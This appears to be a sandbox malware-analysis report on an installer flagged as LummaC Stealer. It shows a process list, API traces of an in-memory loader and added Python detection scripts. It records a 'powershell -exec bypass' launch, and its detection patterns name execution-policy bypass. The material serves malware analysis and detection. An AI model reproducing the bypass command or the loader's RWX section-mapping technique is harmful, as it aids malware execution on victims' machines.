                                                                                                                                                                Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                2024-12-22 22:30:52 UTC1369INData Raw: 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d
                                                                                                                                                                Data Ascii: errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-
                                                                                                                                                                2024-12-22 22:30:52 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63
                                                                                                                                                                Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-c
                                                                                                                                                                2024-12-22 22:30:52 UTC1013INData Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e
                                                                                                                                                                Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span
                                                                                                                                                                2024-12-22 22:30:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:17:30:03
                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Full_Ver_Setup.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:74'953'137 bytes
                                                                                                                                                                MD5 hash:5258CA149EEA36D761A7E5649CB93855
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:17:30:51
                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site 
attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638f1188e30f7d</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var 
a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html>
                                                                                                                                                                Imagebase:0xa20000
                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:17:30:51
                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true
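Target 4 records the loader handing whatever it received for /int_clp_ldr_sha.txt, in this run a Cloudflare "Suspected phishing" interstitial, straight to `powershell -exec bypass <body>`. Windows PowerShell treats trailing unnamed text as -Command, so the HTML itself is what gets parsed, and no further stage appears in the process list. The following is an added detection example, not Joe Sandbox code and not one of the report's Sigma rules: it runs over constructed process-creation events (the Sysmon-style Image and CommandLine field names are an assumption), resolves the abbreviated powershell.exe parameters the way the binary does, and flags a command text that is a web page. The first event's command line is the report's, cut after its <title> element.

```python
"""Flag PowerShell launches whose command text is a fetched web page.

Added example for this report, not Joe Sandbox code and not one of the
report's Sigma rules.  The events below are constructed (Sysmon-style
Image/CommandLine fields are an assumption); the first command line is the
report's own, truncated after the <title> element.
"""
import re

EVENTS = [
    {   # Target 4 from the report, truncated after the <title> element
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> '
                       '<html class="no-js ie6 oldie" lang="en-US"> <![endif]--> '
                       '<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> '
                       '<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> '
                       '<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> '
                       '<head> <title>Suspected phishing site | Cloudflare</title>',
    },
    {   # Constructed: ordinary scheduled-task use, default policy, script file
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\ops\rotate-logs.ps1",
    },
    {   # Constructed: bypass alone is worth a finding, but no fetched page in the command
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -Command "Get-Service spooler"',
    },
    {   # Target 5 from the report: not PowerShell, must be ignored
        "Image": r"C:\Windows\System32\conhost.exe",
        "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    },
]

HTML_START = re.compile(r"^\s*<(?:!doctype\s+html|html|head|body|script)\b", re.I)
TITLE = re.compile(r"<title>(.*?)</title>", re.I | re.S)


def _is(body, name, *aliases):
    """powershell.exe accepts prefixes of a parameter name (two characters or more)
    plus a few documented short aliases; this models only the parameters that matter here."""
    return body in aliases or (len(body) >= 2 and name.startswith(body))


def classify_switch(token):
    body = token.lstrip("-/").lower()
    if _is(body, "executionpolicy", "ep"):
        return "policy"
    if _is(body, "windowstyle", "w"):
        return "value"          # takes a value we do not need
    if _is(body, "command", "c"):
        return "command"
    if _is(body, "file", "f"):
        return "file"
    if _is(body, "encodedcommand", "e", "ec", "enc"):
        return "encoded"
    return "flag"               # -NoProfile, -NonInteractive, -NoExit, -Sta, ...


def split_powershell(cmdline):
    """Return (policy, mode, command_text); mode is how the text will be interpreted:
    'command', 'file', 'encoded', or 'positional' (unnamed trailing text)."""
    tokens = cmdline.split()
    policy, mode, i = None, "positional", 1
    while i < len(tokens) and tokens[i][0] in "-/":
        kind = classify_switch(tokens[i])
        if kind == "policy" and i + 1 < len(tokens):
            policy, i = tokens[i + 1].lower(), i + 2
        elif kind == "value":
            i += 2
        elif kind in ("command", "file", "encoded"):
            mode, i = kind, i + 1
            break
        else:
            i += 1
    return policy, mode, " ".join(tokens[i:])


def detect(event):
    """Findings for one process-creation event; an empty list means nothing to report."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    policy, mode, text = split_powershell(event["CommandLine"])
    findings = []
    if policy in ("bypass", "unrestricted"):
        findings.append(f"execution policy {policy}")
    # Unnamed trailing text is -Command for powershell.exe but -File for pwsh.exe.
    runs_as_command = mode == "command" or (mode == "positional" and image == "powershell.exe")
    if runs_as_command and HTML_START.match(text):
        m = TITLE.search(text)
        where = f" (title: {m.group(1).strip()})" if m else ""
        findings.append("HTML document passed as command text" + where)
    return findings


def scan(events=EVENTS):
    """Map event index to findings, listing only the events that produced any."""
    return {i: f for i, e in enumerate(events) if (f := detect(e))}


if __name__ == "__main__":
    for i, findings in scan().items():
        print(i, findings)
```

Matching on parameter prefixes rather than on the literal string "-ExecutionPolicy" is what makes the rule hold against the report's "-exec bypass"; the HTML check is deliberately narrow so that a benign script passed with -File, as in the second event, produces nothing.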


                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                  Signature Coverage:31.6%
                                                                                                                                                                  Total number of Nodes:117
                                                                                                                                                                  Total number of Limit Nodes:11
execution_graph: node and edge dump of the interactive call graph for the decrypted code at 0x3200000 (117 nodes, 11 limit nodes; the rendering does not survive extraction). Recoverable structure, in call order: the entry at 0x32003c9 locates the PEB (GetPEB), enumerates threads with CreateToolhelp32Snapshot and Thread32First, calling Wow64SuspendThread and CloseHandle inside that loop, then reaches the 0x324af7e routine through two CreateThread calls (0x320064d, 0x3200a42). That routine resolves imports with repeated LoadLibraryA calls and performs the mapping sequence VirtualAlloc, NtCreateSection, NtMapViewOfSection (twice), VirtualProtect (three calls), CreateThread (0x324d14e) and VirtualFree; the 0x320094d path ends in TerminateProcess.
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0324CA22
                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 0324CACA
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0324CE3E
                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0324CEF3
                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0324CF10
                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0324CFB3
                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0324CFE6
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0324D157
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                  • Instruction ID: 2fa359134b06ca014d72af3430a9406153985e6642828506071a912b9c3d9b88
                                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                  • Instruction Fuzzy Hash: 18429F71615352AFD728CF28CC44B6BBBE9EF88714F08492DF9899B251D770E980CB91

                                                                                                                                                                  Control-flow Graph

• Graph nodes, edges and the executed/not-executed colouring are not reproduced. Blocks 03200AD9 to 03200BF9: CreateToolhelp32Snapshot, then Thread32First, then a loop over the thread entries that calls Wow64SuspendThread and CloseHandle on matching entries and returns through 03200BE2.
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0320061F,?,00000001,?,81EC8B55,000000FF), ref: 03200B17
                                                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 03200B43
                                                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 03200B96
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 03200BC0
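The two listings above (the NtCreateSection / NtMapViewOfSection / VirtualProtect / CreateThread sequence of the routine at 0324C989, and the CreateToolhelp32Snapshot / Thread32First / Wow64SuspendThread loop at 03200AD9) print their arguments as raw hex. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses these API lines (copied from this page as constructed input), replaces the recognisable flag arguments with their Win32/NT constant names (standard SDK values, including the 0000C000 passed to VirtualFree further down this page), and flags the two call sequences. The two pattern heuristics, `is_section_loader` and `is_thread_suspend_loop`, are this editor's reading of the traces and an assumption about intent, not something the report itself states.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function listing and flag two call patterns.

Constructed input: the API lines below are copied from the report (bullets dropped).
Constant names are standard Win32/NT SDK values; the pattern heuristics are the
editor's own reading of the call sequences and are not part of the report.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample input: API lines of the loader routine at 0324C989 (from the report).
TRACE_SECTION_LOADER = """\
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0324CA22
NtMapViewOfSection.NTDLL(?,00000000), ref: 0324CACA
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0324CE3E
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0324CEF3
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0324CF10
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0324CFB3
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0324CFE6
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0324D157
"""

# Constructed sample input: API lines of the thread-suspend routine at 03200AD9 (from the report).
TRACE_THREAD_SUSPEND = """\
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0320061F,?,00000001,?,81EC8B55,000000FF), ref: 03200B17
Thread32First.KERNEL32(00000000,0000001C), ref: 03200B43
Wow64SuspendThread.KERNEL32(00000000), ref: 03200B96
CloseHandle.KERNEL32(00000000), ref: 03200BC0
"""

LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)

# (API name, zero-based argument index) -> constant values known to appear at that position.
FLAG_ARGS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("NtCreateSection", 1): {0x000F001F: "SECTION_ALL_ACCESS"},
    ("NtCreateSection", 4): {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"},
    ("NtCreateSection", 5): {0x01000000: "SEC_IMAGE", 0x04000000: "SEC_RESERVE", 0x08000000: "SEC_COMMIT"},
    ("VirtualAlloc", 2): {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x3000: "MEM_COMMIT|MEM_RESERVE"},
    ("VirtualAlloc", 3): {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"},
    ("VirtualProtect", 2): {0x02: "PAGE_READONLY", 0x08: "PAGE_WRITECOPY",
                            0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"},
    ("VirtualFree", 2): {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE", 0xC000: "MEM_DECOMMIT|MEM_RELEASE"},
    ("CreateToolhelp32Snapshot", 0): {0x02: "TH32CS_SNAPPROCESS", 0x04: "TH32CS_SNAPTHREAD",
                                      0x08: "TH32CS_SNAPMODULE"},
}


def parse_trace(text: str) -> List[dict]:
    """Parse report lines into dicts holding API name, module, decoded args and call-site ref."""
    calls: List[dict] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip().lstrip("•").strip())
        if not m:
            continue  # headings and other non-API lines are ignored
        decoded: List[str] = []
        for index, raw in enumerate(a.strip() for a in m["args"].split(",")):
            if raw == "?":
                decoded.append("?")  # Joe Sandbox could not recover this argument
                continue
            value = int(raw, 16)
            names = FLAG_ARGS.get((m["api"], index), {})
            decoded.append(names.get(value, f"0x{value:X}"))
        calls.append({"api": m["api"], "module": m["module"], "args": decoded, "ref": m["ref"].upper()})
    return calls


def in_order(seq: Iterable[str], wanted: List[str]) -> bool:
    """True if every name in `wanted` occurs in `seq` in that order (not necessarily adjacent)."""
    it = iter(seq)
    return all(any(name == w for name in it) for w in wanted)


def is_section_loader(calls: List[dict]) -> bool:
    """Heuristic (editor's assumption): an RWX section is created, mapped, re-protected,
    and a thread is started afterwards, i.e. code is staged through a section object."""
    rwx = any(c["api"] == "NtCreateSection" and "PAGE_EXECUTE_READWRITE" in c["args"] for c in calls)
    return rwx and in_order((c["api"] for c in calls),
                            ["NtCreateSection", "NtMapViewOfSection", "VirtualProtect", "CreateThread"])


def is_thread_suspend_loop(calls: List[dict]) -> bool:
    """Heuristic (editor's assumption): a thread snapshot is walked and threads are suspended."""
    snap = any(c["api"] == "CreateToolhelp32Snapshot" and c["args"] and c["args"][0] == "TH32CS_SNAPTHREAD"
               for c in calls)
    return snap and in_order((c["api"] for c in calls),
                             ["CreateToolhelp32Snapshot", "Thread32First", "Wow64SuspendThread"])


def report(text: str) -> List[str]:
    """Return one decoded line per call plus any pattern findings for one function listing."""
    calls = parse_trace(text)
    findings = [f"{c['ref']}: {c['api']}({', '.join(c['args'])})" for c in calls]
    if is_section_loader(calls):
        findings.append("PATTERN: RWX section created, mapped and executed via a new thread")
    if is_thread_suspend_loop(calls):
        findings.append("PATTERN: thread snapshot walked, threads suspended with Wow64SuspendThread")
    return findings


if __name__ == "__main__":
    for trace in (TRACE_SECTION_LOADER, TRACE_THREAD_SUSPEND):
        print("\n".join(report(trace)), end="\n\n")
```

Running the script decodes, for example, the first NtCreateSection call as `SECTION_ALL_ACCESS`, `PAGE_EXECUTE_READWRITE`, `SEC_COMMIT` and the three VirtualProtect calls as `PAGE_WRITECOPY`, unknown, `PAGE_READONLY`, which is what makes the section-loader pattern readable at a glance. Arguments the sandbox printed as `?` stay `?`; the table only names values at positions where the API takes a flag, so an unknown value at a flag position is shown as plain hex rather than guessed.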
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                  • Instruction ID: 4747ebb9afa9535cbd3980730eb195f0c81ccbf8fb8c6df881fa05eac756855c
                                                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                  • Instruction Fuzzy Hash: F6411C71B00109AFEB18DF98C490FADB7B6EF88304F10C068E6159B7D5DA74AE85CB54

                                                                                                                                                                  Control-flow Graph

• Graph nodes, edges and the executed/not-executed colouring are not reproduced. Blocks 032003C9 to 03200965: calls the helpers at 03200979, 03200F79, 03201129 and 03200D19, loops through 03200E99, reads the PEB, calls the thread-suspend routine at 03200AD9 (on two separate paths), CreateThread, the helper at 03200FD9, and ends in TerminateProcess at 03200936.
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 0320066C
                                                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 03200960
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                                                                                  • String ID: p{YA
                                                                                                                                                                  • API String ID: 1197810419-2021486378
                                                                                                                                                                  • Opcode ID: 727778e22dda85a0d5cc3dc9cbcbccc5dbf97ba66240c5429bce3c9accd892eb
                                                                                                                                                                  • Instruction ID: da9eaa14eb4feb9de39af93a90afbb4a1e4a94823cb53edf56f8c8a98d4007fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 727778e22dda85a0d5cc3dc9cbcbccc5dbf97ba66240c5429bce3c9accd892eb
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C12F3B4E10209DFEB14CF98D990BADBBB1FF48304F2482A9D505AB385C7746A85CF54

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 271 3200989-32009e0 GetPEB 272 32009eb-32009ef 271->272 273 32009f5-3200a00 272->273 274 3200a8f-3200a96 272->274 276 3200a06-3200a1d 273->276 277 3200a8a 273->277 275 3200aa1-3200aa5 274->275 279 3200ab6-3200abd 275->279 280 3200aa7-3200ab4 275->280 281 3200a42-3200a5a CreateThread 276->281 282 3200a1f-3200a40 276->282 277->272 285 3200ac6-3200acb 279->285 286 3200abf-3200ac1 279->286 280->275 283 3200a5e-3200a66 281->283 282->283 283->277 287 3200a68-3200a85 283->287 286->285 287->277
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 03200A55
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3200000_Full_Ver_Setup.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                  • String ID: ,
                                                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                  • Instruction ID: 9e3bf93759fc40ca17019ff6930e7af913c8a9305201941b4b360e43e009a6e9
